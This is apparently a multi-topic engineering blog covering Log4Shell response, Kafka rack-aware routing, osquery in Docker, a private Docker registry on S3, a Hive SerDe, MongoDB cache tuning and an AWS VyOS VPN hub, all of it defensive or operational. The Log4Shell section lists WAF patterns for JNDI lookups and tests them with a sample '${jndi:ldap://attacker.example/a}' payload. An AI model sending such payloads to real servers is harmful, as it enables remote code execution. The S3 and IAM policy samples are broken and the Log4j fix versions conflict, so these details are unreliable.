log4j2 CVE-2021-44228 – Log4Shell

What is it?

  • One of the most severe security vulnerabilities in recent times
  • Only impacts Java applications, but only those using a very popular logging library (which is many of them)
  • The application does not need to be Internet facing. If user-provided input makes its way to the application and is processed by the logging library, it may be vulnerable
  • A well-crafted string sent as part of HTTP header(s) or the HTTP body can compromise the application if it reaches the logging library

What is vulnerable and which version has the fix?

  • log4j (1.x) is a legacy library. It has its own vulnerabilities, but none as severe as this one
  • log4j-core jar file from log4j2 library has the vulnerable class
  • log4j-core-2.0-beta9.jar through log4j-core-2.14.1.jar are vulnerable
  • log4j-core-2.3.2.jar (for JDK6), log4j-core-2.12.4.jar (for JDK7) and log4j-core-2.17.1.jar (for JDK8 and later) have the fix

What does a compromised application do?

  • Pretty much anything is possible
  • Exfiltrate secrets and other sensitive data
  • Move laterally to other parts of the infrastructure
  • Ransomware/spyware/… attacks
  • Exploit does not necessarily create additional processes
  • Initial exploit instructions may be downloaded from the Internet by the vulnerable Java application

What inventory should I gather?

  • Dev, staging, test, production, … machines
  • Cloud VMs, containers
  • Serverless
  • Artifactory and other internal registries/caches
  • Container registries
  • Blob stores with build artifacts
  • Employee machines

What information am I gathering?

  • Vendor software with Java
  • Looking for vulnerable Java applications
  • Looking for all log4j version 1 and 2 artifacts

How am I fixing this?

  • Leave log4j 1.x alone? Upgrade? What about third-party software with no option to upgrade to the latest log4j2? (lower priority)
  • Upgrade to 2.12.2 or later (JDK 7) or 2.16.0 or later (JDK 8 and above)
  • Add the environment variable (LOG4J_FORMAT_MSG_NO_LOOKUPS=true) or JVM property (-Dlog4j2.formatMsgNoLookups=true)? These mitigations were later shown to be insufficient and do not fully fix the vulnerability

  • Delete the class file? Where is this done: post build or pre deployment? Post build is ideal

What do I look for?

  • Java processes
  • Containers with Java processes
  • JDK/JRE version
  • jar/ear/war/jmod files. Unfortunately java -jar can run any arbitrary file with any extension. Let's hope you don't have any of those 🙂
  • Do I have uber jars, shaded jars, jmod, …
  • Do I have compressed jars?
  • Are the jars obfuscated?

I removed JndiLookup.class. How do I validate?

  • For each Java process, if jps is available:
for i in $(jps | grep -v Jps | awk '{print $1}'); do jcmd $i GC.class_histogram | grep -q JndiLookup && echo "PID $i MIGHT be vulnerable"; done
  • Basically make sure the class is not loaded by your application

I upgraded to a fixed version. How do I validate?

  • Get an inventory of all jar/ear/war/jmod files opened by the process
  • For each file opened by the process, check whether it is, or contains, a vulnerable log4j-core jar
  • Validate on an ongoing basis to avoid deploying vulnerable applications via auto scaling, old build artifacts, etc.
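On a Linux host, that per-process jar inventory can be sketched with pgrep plus lsof (assumes lsof and unzip are installed; it prints nothing and exits cleanly when no Java processes are running):

```shell
# For every running java process, list the jar files it holds open,
# then check each jar for bundled log4j-core classes.
for pid in $(pgrep java 2>/dev/null); do
  lsof -p "$pid" 2>/dev/null | awk '/\.jar$/ {print $NF}' | sort -u |
    while read -r jar; do
      unzip -l "$jar" 2>/dev/null | grep -q 'log4j/core' &&
        echo "PID $pid: $jar bundles log4j-core classes"
    done || true
done
```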

Build process?

  • Scan container images for vulnerable version
  • Scan Java artifacts for vulnerable version

What can my other teams do?

  • If you have a Web Application Firewall (WAF), use it. Make sure you apply the following rules:

Match ${.*${, ${jndi, or ${ctx patterns in HTTP headers or the body payload

  • If you have an EDR/XDR product, for non-patched assets/Java processes:
    • Monitor processes spawned by Java processes
    • Monitor egress traffic to Internet (if the process is not expected to reach out to Internet)
  • Now is the time to look at egress firewall/security group rules. If your Java processes are in a subnet where they are not expected to reach the Internet, add egress blocking
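The WAF patterns above can be illustrated with a quick grep; both request fragments here are fabricated, and a real WAF rule would be more robust (these substrings are easy to evade with nested lookups):

```shell
# Two fabricated request fragments; only the second carries a lookup payload.
printf '%s\n' \
  'User-Agent: curl/7.79' \
  'X-Api-Version: ${jndi:ldap://attacker.example/a}' |
  grep -E '\$\{jndi|\$\{ctx|\$\{.*\$\{' && echo "matched: would block"
# prints the matching line, then "matched: would block"
```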

What else?

  • Apply download blocking and remove vulnerable versions from artifactory etc.
  • Delete container images that are vulnerable to prevent accidental deployment
  • Delete build artifacts that are vulnerable
  • Make sure employees are not able to push to container registries and internal build artifact repository
  • Clean maven/gradle caches from employee machines, in case there are privileged users who can update container registries or build artifacts from their machines
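The cache cleanup can be sketched as follows, using the default Maven and Gradle cache locations (these paths are the usual defaults; verify before deleting anything):

```shell
# Remove cached log4j-core artifacts from the default local build cache paths.
rm -rf "$HOME/.m2/repository/org/apache/logging/log4j/log4j-core"
find "$HOME/.gradle/caches" -type d -name 'log4j-core' \
  -exec rm -rf {} + 2>/dev/null || true
```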


Kafka producer routing

If you are using Kafka and AWS, you probably have something like the following in one of the AWS regions: multiple availability zones (AZs), one or more Kafka brokers in each AZ, and multiple producers sending data to one or more topics in each AZ.


This is AWS/Cloud best practice for high availability and scalability. Each topic's replication factor should be more than one, with a decent number of partitions (greater than or equal to the maximum number of consumers).

Depending on the partition selection logic in producers, messages from 1a might be routed to a broker in 1b, which might replicate the message to the 1c broker. There are multiple options for how to select a partition in the producer:

  • Use a hard coded partition number 😦
  • Randomly pick one of the partitions
  • Cycle through the partitions
  • Based on a message key, generate a hash code and pick a partition from the hash code and the number of partitions
  • Or some other custom logic
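The key-hash option can be illustrated in a couple of lines; cksum stands in here for whatever hash function the client library actually uses, and the key and partition count are made up:

```shell
# Pick a partition from a message key: hash the key, mod the partition count.
key="device-42"
partitions=120
hash=$(printf '%s' "$key" | cksum | awk '{print $1}')
echo "key $key -> partition $((hash % partitions))"
```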

Different client libraries have different out-of-the-box options for partition selection. What happens if your producers are high volume, pumping terabytes of data? There are two issues with high-volume deployments:

  • Network throughput across AZs might not be as high as within an AZ
  • There is a cost associated with cross-AZ data transfer. I think it is $10 per TB

There are a couple of options to work around this. A while back, support for rack-aware replica assignment was added to Kafka. To take advantage of rack awareness, a new property called broker.rack was introduced. In the case of AWS this should be set to the AZ name, e.g. us-east-1c. This information is also made available in the metadata API response. Using this information, producer partition selection can do the following:
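For example, a broker in us-east-1c would carry (standard Kafka broker property; the value is just the AZ name):

```
# server.properties on each broker
broker.rack=us-east-1c
```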


Producers in each AZ can select partitions belonging to the brokers in the same AZ. Broker rack information and topic partition leaders can be retrieved using a metadata request. Producers can narrow down the partition list based on their AZ. Within the filtered list of partitions, the producer can apply one of the partition selection algorithms noted above. For example, if there are 120 partitions, ideally brokers in each AZ will be leaders for 40 partitions. Producers in an AZ will pick one of those 40 partitions and route messages to the partition leader in the same AZ.
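The narrowing step itself is simple set filtering. A toy sketch with a fabricated partition-to-rack mapping (a real producer would build this map from the metadata response):

```shell
# Keep only partitions whose leader's rack matches our AZ.
my_az="us-east-1a"
# "partition:rack" pairs, as a metadata request would conceptually report them
meta="0:us-east-1a 1:us-east-1b 2:us-east-1c 3:us-east-1a"
local_parts=""
for p in $meta; do
  [ "${p#*:}" = "$my_az" ] && local_parts="$local_parts ${p%%:*}"
done
echo "partitions local to $my_az:$local_parts"
# prints "partitions local to us-east-1a: 0 3"
```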

When the replication factor is greater than one, messages will still cross the AZ boundary. But less data crosses AZs compared to non-rack-aware partition selection.

I patched a fork of the kafka-node library with rack-aware routing logic. It is a combination of rack-based filtering plus message-key hashcode based partition selection.


Docker and osquery

If you are into security you might have heard about osquery. It is an extremely powerful tool that can be used for various purposes:

  • Real time endpoint monitoring
  • Anomaly detection
  • File integrity monitoring
  • Metrics (prometheus)
  • Container (docker) monitoring
  • syslog aggregation

Numerous enterprises big and small from all verticals are using it, or planning on using it. It is being deployed to production servers as well as employee desktop/laptops. It has first class support for various flavors of Linux and macOS. Windows functionality is maturing, thanks to open source community contributions and Facebook’s efforts.

Recently we (Uptycs) started publishing docker images with the latest osquery version. We published images for various versions of Ubuntu and CentOS. Generally, running osquery in a docker container doesn't make sense unless you are using CoreOS Container Linux. But if you are just playing with osquery and want to test some functionality, docker images are ideal. osquery comes with two binaries: the interactive shell osqueryi and the osqueryd daemon.

The interactive shell can be launched as follows. It will present a SQL prompt:

$ docker run -it uptycs/osquery:2.7.0 osqueryi
Using a virtual database. Need help, type '.help'

You can run sample queries like:

osquery> SELECT * FROM processes;

When running inside the container, osquery will only return information available to it from within the container. In the case of processes, which are retrieved from /proc, osquery will return the processes running inside the container. In this case it will be one process: /usr/bin/osqueryi

If you omit the command part it will launch the osquery daemon with a warning:

$ docker run -it uptycs/osquery:2.7.0
W0919 19:46:14.058230 7 init.cpp:649] Error reading config: config file does not exist: /etc/osquery/osquery.conf

This is because the Dockerfile is configured to run the osquery daemon by default with the following arguments:

osqueryd --flagfile /etc/osquery/osquery.flags --config_path /etc/osquery/osquery.conf

The flags file and the config file are meant to be provided from the host. osquery has an extensive number of command line flags. Optionally, a configuration file can also be provided to the container. Refer to the osquery configuration documentation for what can be specified in the conf file.

Assuming osquery.flags and osquery.conf are created on host machine in directory /some/path, osquery daemon can be launched as:

$ docker run -it -v /some/path:/etc/osquery uptycs/osquery:2.7.0

osquery can also gather information about docker. When osquery is running inside a container, it cannot talk to the docker daemon running on the host machine. If you expose the docker UNIX domain socket from the host to the container, osquery can query/gather information about docker images, containers, volumes, networks, labels, etc.:

$ docker run -it -v /some/path:/etc/osquery -v/var/run/docker.sock:/var/run/docker.sock uptycs/osquery:2.7.0
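With the socket mounted, the docker tables become queryable from the shell. For example (table and column names as I recall them from osquery's docker tables; check .schema in your version):

```
osquery> SELECT id, name, image, state FROM docker_containers;
osquery> SELECT id, tags, size_bytes FROM docker_images;
```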

If logging is configured, the osquery daemon needs to identify itself to the log endpoint. The --host_identifier flag should be appropriately configured. If the hostname value is used for the host identifier, you might want to start docker with the hostname option:

$ docker run -it --hostname osquery1.example.com -v /some/path:/etc/osquery -v/var/run/docker.sock:/var/run/docker.sock uptycs/osquery:2.7.0

host_identifier with the uuid value is not appropriate if you are planning on launching multiple osquery docker instances, or if you have osquery running on the host as well: the docker containers will end up sharing the same UUID.

As I mentioned above, osquery in docker only makes sense for playing with osquery or testing it. In real deployments it should run on the host or virtual machine. In the case of CoreOS Container Linux there is no easy way to run a service on the host/virtual machine; there, osquery can be run inside toolbox, which uses systemd-nspawn. I will cover this in a separate post.


Private docker registry on AWS with S3

Creating a private docker registry is pretty trivial and well documented. If you are just playing with it, docker hub might be a good start. A few things to figure out before starting with a private registry:

  • Storage. There are numerous options
    • File system
    • Azure
    • Google cloud (GCS)
    • AWS S3
    • Swift
    • OSS
    • In memory (not a good option unless you are testing)
  • Authentication
    • silly (as the name implies, it is really silly and not suitable for real deployments)
    • htpasswd (Apache htpasswd style authentication; credentials are predefined in a file and only suitable when used with TLS)
    • token (OAuth 2.0 style authentication using a Bearer token; this could be tricky if you have Jenkins or other CI systems building and pushing docker images)
  • Transport security
    • Use of TLS is strongly advised. If you don't have an X509 cert/key, use the letsencrypt free service
  • Storage security
    • Ideally image data should also be secured at rest. See below for S3 storage security
  • Regions
    • If accessing data from multiple regions is required, docker registry provides ability to use CloudFront

Here is a quick and easy setup on AWS using S3 as storage:

  • Create S3 bucket in the region you want to save the images (my-docker-registry)
  • If you got burned by the AWS S3 outage a few months back, you would also replicate your bucket to another region 🙂 It is pretty simple to set up
  • I also recommend encrypting data in the S3 bucket. You can do this using AWS Key Management Service (KMS) or using Server Side Encryption (SSE) with AES-256. If you are replicating the bucket data to other region(s), you cannot use KMS
  • For the buckets, set a bucket policy (under bucket permissions) to enforce encrypted data. Here is a sample bucket policy enforcing SSE AES-256:
    "Version": "2012-10-17",
    "Id": "PutObjPolicy",
    "Statement": [
            "Sid": "DenyIncorrectEncryptionHeader",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::my-docker-registry/*",
            "Condition": {
                "StringNotEquals": {
                    "s3:x-amz-server-side-encryption": "AES256"
            "Sid": "DenyUnEncryptedObjectUploads",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::my-docker-registry/*",
            "Condition": {
                "Null": {
                    "s3:x-amz-server-side-encryption": "true"
  • Figure out where you are going to run the registry. Docker registry is a docker image. It is better to have this EC2 instance in the same region as the S3 bucket. Ideally it should be in a VPC with a S3 endpoint configured. Whether the instance should have Public IP or not depends on where you are going to push/pull the images from!
  • Ideally the instance hosting the docker registry is launched with an IAM role. This way there won't be a need to provision access/secret keys. Here is a sample IAM policy (the S3 actions needed are listed in the registry's S3 storage driver documentation):
    "Version": "2012-10-17",
    "Statement": [
            "Effect": "Allow",
            "Action": [
            "Resource": "arn:aws:s3:::my-docker-registry"
            "Effect": "Allow",
            "Action": [
            "Resource": "arn:aws:s3:::my-docker-docker/*"
  • Configure the Security Group for the instance appropriately. Ideally, disable all incoming ports except 22 and 443 from your specific IP address
  • Follow the installation instructions to install latest docker on the instance
  • The user who is going to bring up the docker registry container should have access to talk to the docker daemon. You can either do this as the root user 😦 or make a regular user part of the docker group (usermod -a -G docker userid)
  • Create a docker-compose.yml file. Here is a sample. In this case I used an X509 cert/key issued by a CA:
registry:
  restart: always
  image: registry:2
  ports:
   - 443:5000
  volumes:
   - /host/path/to/certs:/certs
   - /host/path/to/config.yml:/etc/docker/registry/config.yml
  • Create the /host/path/to/config.yml registry configuration. Here is a sample template with S3 storage and TLS configuration:
version: 0.1
storage:
  s3:
    region: us-east-1
    bucket: my-docker-registry
    encrypt: true
    secure: true
    v4auth: true
    chunksize: 5242880
    multipartcopychunksize: 33554432
    multipartcopymaxconcurrency: 100
    multipartcopythresholdsize: 33554432
  cache:
    blobdescriptor: inmemory
http:
  addr: :5000
  net: tcp
  prefix: /
  host: https://<registry hostname>
  tls:
    certificate: /certs/hostname.crt
    key: /certs/hostname.key
  headers:
    X-Content-Type-Options: [nosniff]
validation:
  disabled: false
  • Change <registry hostname> to the appropriate value. In this case I used a real X509 certificate and key that are copied to the host and made available to the docker registry image. The other option is to use a letsencrypt configuration
  • Bring up the docker registry:
$ docker-compose up -d
# Check logs
$ docker-compose logs registry
  • Now it should be possible to tag and push any image to your registry. For example:
$ docker pull ubuntu
$ docker tag ubuntu <registry hostname>/ubuntu
$ docker push <registry hostname>/ubuntu

At this point the registry should be working and usable, but because authentication is not yet set up, you should make sure it is only accessible from trusted hosts.


PostgreSQL to Hadoop/Hive

Ever tried to get data from PostgreSQL to Hive? I came across the CSV SerDe bundled in the latest version of Apache Hive, but for all practical purposes it is useless: it treats every column as a string. So I wrote my own SerDe. You can find the source on GitHub. Dump your PostgreSQL table data using pg_dump or psql with COPY in plain text format.
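The export side can be as simple as a psql \copy (the connection details below are placeholders). The printf fabricates one row in the same plain-text COPY format so you can see what the SerDe has to parse: tab-delimited columns, booleans as t/f, and \N for NULL:

```shell
# Real export (placeholder connection details):
#   psql -h dbhost -U dbuser mydb -c "\copy my_table TO 'my_table.dump'"
# Fabricate one row of the same plain-text COPY format:
printf 'id1\t2017-06-01 10:00:00\tt\t42\n' > my_table.dump
awk -F'\t' '{print NF " columns"}' my_table.dump   # prints "4 columns"
```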

Download the pgdump-serde jar to your local machine. Open the hive shell and add the jar. Create an external table and load the dump data. If you are using a pg_dump file, this SerDe cannot handle schema, comments, column headers, etc., so remove any header/footer that is not row data.

hive> add jar <path to>/pgdump-serde-1.0.4-1.2.0-all.jar;
hive> USE my_database;
hive> CREATE EXTERNAL TABLE `my_table_ext` (
  `id` string,
  `time` timestamp,
  `what` boolean,
  `size` int)
ROW FORMAT SERDE 'com.pasam.hive.serde.pg.PgDumpSerDe'
LOCATION '/tmp/my_table_ext.txt';
hive> LOAD DATA LOCAL INPATH '<path to dump directory>/my_table.dump' OVERWRITE INTO TABLE my_table_ext;

MongoDB WiredTiger slow queries

Recently we hit a production MongoDB (version 3.2.6) issue. MongoDB was reporting lots of slow queries, and our application was starting to show performance issues. Some of the slow responses were for covered queries.

mongostat was reporting very high %used for the WiredTiger cache, and it was not coming down. As a result we were seeing a significantly high value for db.serverStatus().wiredTiger.cache["pages evicted by application threads"]. This was causing many queries to slow down. Ideally this value should be zero. Application threads start evicting pages when cache %used hits 96%; ideally it should stay around 80%.

Currently experimenting with WiredTiger eviction parameters to see if it makes any difference:

  • eviction_trigger
  • eviction_target
  • eviction_dirty_target
  • eviction=(threads_min=X,threads_max=Y)
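These can be adjusted at runtime through MongoDB's wiredTigerEngineRuntimeConfig server parameter. A sketch from the mongo shell; the specific values here are experiments to tune against your workload, not recommendations:

```
db.adminCommand({
  setParameter: 1,
  wiredTigerEngineRuntimeConfig:
    "eviction=(threads_min=4,threads_max=8),eviction_trigger=92,eviction_target=80"
})
```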

It looks like the eviction server is not able to keep up with evicting pages, and it gets into a state where application threads are evicting pages, causing the slowdown 😦


We had thousands of collections in this database and tens of thousands of indices. Most of the collections were collection shards to work around MMAPv1 collection lock contention. Before we sharded the collections, one of them grew very big: tens of millions of entries. In this scenario, depending on the application's CRUD pattern, you can hit cache related issues. There are two solutions that worked for me with WiredTiger: either evenly balance the sharded collections or consolidate them.


AWS VPN High Availability

This is a refinement of my previous approach. In the previous model there were two VyOS instances in every AWS region. In this model there are only two VyOS instances, in the hub region. All Amazon regions (including the hub region) connect to these VyOS instances. Each line below represents two tunnels: Amazon VPN comes with two tunnels, but both tunnels connect to the same server (VyOS) on the other end.


Total cost comes down to (2 * $0.05 per hour * number of regions) + (2 * instance cost for VyOS). In our deployment I chose c3.2xlarge, which is $0.42 per hour; for reserved instances that price comes down to roughly $0.20+ per instance-hour. For a total of four regions the cost per hour is (2 * 0.05 * 4) + (2 * 0.42) = $1.24 per hour (on-demand instances). For 1-year reserved, the cost comes down to roughly $0.90 per hour. c3.2xlarge is probably bigger than what we need, but it has high network throughput.
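The on-demand arithmetic as a quick sanity check:

```shell
# 2 VPN connections per region at $0.05/hr across 4 regions,
# plus 2 on-demand c3.2xlarge VyOS instances at $0.42/hr.
awk 'BEGIN { printf "on-demand total: $%.2f/hr\n", 2*0.05*4 + 2*0.42 }'
# prints "on-demand total: $1.24/hr"
```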

Figure out your hub AWS region. Launch two VyOS AMIs in two different availability zones:

  • These should be in public subnet with public IP addresses
  • Enable termination protection if you want to be on the safe side
  • Change shutdown behavior to stop the instance (instead of terminate)
  • Disable source/destination checks (important)
  • Use an open security group until the configuration is done

Allocate two Elastic IPs (EIP) and associate them with the two instances

Upgrade VyOS to the latest version (accept the default values for all the prompts). Reboot after it is done:

$ add system image http://packages.vyos.net/iso/release/version/vyos-version-amd64.iso
$ reboot

In every region (including the hub), create two customer gateways (CGW), one for each VyOS instance

  • Use dynamic routing
  • Use a BGP ASN from the private space (e.g. 65000). Use the same value for all CGWs
  • Use the Elastic IP address of VyOS

Also in every region, create a Virtual Private Gateway (VPG) and attach it to the VPC. Finally, create two VPN connections (one for each CGW):

  • VPG should match the one created before
  • Routing should be dynamic

Once the VPNs are created, download the configuration for each one of them

  • Vendor: Vyatta
  • Platform: Vyatta Network OS
  • Software: Vyatta Network OS 6.5+

There is a lot in common across all of these configuration files. Depending on the number of regions, you might end up with 2, 4, 6, or 8 configuration files. Separate the files into two groups: ones that are associated with CGW1, and the others for CGW2.

$ ssh -i private-key vyos@elastic-ip-of-cgw
$ configure
set vpn ipsec ike-group AWS lifetime '28800'
set vpn ipsec ike-group AWS proposal 1 dh-group '2'
set vpn ipsec ike-group AWS proposal 1 encryption 'aes128'
set vpn ipsec ike-group AWS proposal 1 hash 'sha1'
set vpn ipsec ipsec-interfaces interface 'eth0'
set vpn ipsec esp-group AWS compression 'disable'
set vpn ipsec esp-group AWS lifetime '3600'
set vpn ipsec esp-group AWS mode 'tunnel'
set vpn ipsec esp-group AWS pfs 'enable'
set vpn ipsec esp-group AWS proposal 1 encryption 'aes128'
set vpn ipsec esp-group AWS proposal 1 hash 'sha1'
set vpn ipsec ike-group AWS dead-peer-detection action 'restart'
set vpn ipsec ike-group AWS dead-peer-detection interval '15'
set vpn ipsec ike-group AWS dead-peer-detection timeout '45'

Next, configure the interfaces. All the downloaded VPN configurations refer to vti0 and vti1, but you cannot use the same VTIs for multiple tunnels. So replace vti0/vti1 with vtiX/vtiY appropriately. Example:

set interfaces vti vti3 address '169.A.B.C/30'
set interfaces vti vti3 description 'Oregon to Virginia Tunnel 1'
set interfaces vti vti3 mtu '1436'

set interfaces vti vti4 address '169.X.Y.Z/30'
set interfaces vti vti4 description 'Oregon to Virginia Tunnel 2'
set interfaces vti vti4 mtu '1436'

In the site-to-site section of the downloaded configuration files, local-address will be set to the Elastic IP address of VyOS. VyOS will not like that, because it does not know anything about the EIP. Change it to the local eth0 address (the instance's private IP), and apply the site-to-site configuration:

set vpn ipsec site-to-site peer X.Y.Z.A authentication mode 'pre-shared-secret'
set vpn ipsec site-to-site peer X.Y.Z.A authentication pre-shared-secret 'XX1'
set vpn ipsec site-to-site peer X.Y.Z.A description 'Oregon to Virginia Tunnel 1'
set vpn ipsec site-to-site peer X.Y.Z.A ike-group 'AWS'
set vpn ipsec site-to-site peer X.Y.Z.A local-address '10.A.B.C'
set vpn ipsec site-to-site peer X.Y.Z.A vti bind 'vtiX'
set vpn ipsec site-to-site peer X.Y.Z.A vti esp-group 'AWS'

Next configure BGP:

set protocols bgp 650xy neighbor 169.A.B.E remote-as 'xyz1'
set protocols bgp 650xy neighbor 169.A.B.E soft-reconfiguration 'inbound'
set protocols bgp 650xy neighbor 169.A.B.E timers holdtime '30'
set protocols bgp 650xy neighbor 169.A.B.E timers keepalive '30'

In my setup, I also changed the ntp servers and the hostname:

set system host-name my-hostname
delete system ntp
set system ntp server 0.a.b.ntp.org
set system ntp server 1.a.b.ntp.org
set system ntp server 2.a.b.ntp.org

Amazon instances only get a route for their subnet and not the entire VPC. If you check the output of show ip route, you will see a route for the VyOS subnet. Add a static route for the entire VPC. The following example assumes you have a 10.X.0.0/16 VPC:

set protocols static route 10.X.0.0/16 next-hop 10.X.0.1 distance 10

Finally, configure the route/network BGP will advertise to the other end (Amazon). For BGP to advertise the route, the route should be in the routing table.

set protocols static route 10.Y.0.0/16 next-hop 10.Y.0.1 distance 100
set protocols bgp 650xy network 10.Y.0.0/16

Commit the changes and backup the configuration. And keep a copy of the configuration somewhere safe (not on the VyOS instances).

save /home/vyos/backup.conf

From the backed up configuration file, it is better to remove sections that are specific to the VyOS instance. This way, the configuration can be merged easily when instances need to be replaced later:

  • interfaces ethernet eth0
  • service
  • system

You can refer to VyOS documentation Wiki, but some commands I found useful:

show ip route
show ip bgp
show ip bgp summary
show ip bgp neighbor 169.A.B.E advertised-routes
show ip bgp neighbor 169.A.B.E received-routes
show vpn debug

At this point, all VPN tunnels in all VPCs should be green, and each should be receiving exactly 1 route. Modify all the VPC route tables and enable route propagation. All instances should be able to reach other instances irrespective of which VPC they are in.

If it is necessary to replace a VyOS instance:

  • Kill the instance that is being replaced
  • Create another instance in the same public subnet with the same private IP
  • Choose the correct security group and SSH key
  • Disable the source/dest checks
  • Reassign the EIP from the old instance
  • SCP the backup configuration file to the new VyOS instance
  • SSH to the instance:
$ configure
$ delete system ntp
$ commit
$ merge /home/vyos/backup.conf
$ commit
$ save
$ exit

There are 4 tunnels from each VPC to the hub. If one VyOS box dies, traffic will start flowing through the other one. To test: start a ping from an instance in VPC1 to another instance in VPC2. While this is running, reboot the VyOS1 instance. You should see minimal disruption. Once the VyOS1 box comes up, reboot VyOS2; traffic should fail over appropriately.

Finally, modify the security group/NACLs. NTP uses 123/udp (inbound and outbound). IPsec uses 500/udp and the ESP/AH IP protocols (inbound and outbound). BGP uses 179/tcp. And of course you want SSH (22/tcp) open as well. You can restrict the security group/NACLs by port/protocol; another option is to whitelist the Amazon VPN tunnel IP addresses and allow all traffic from those IPs.
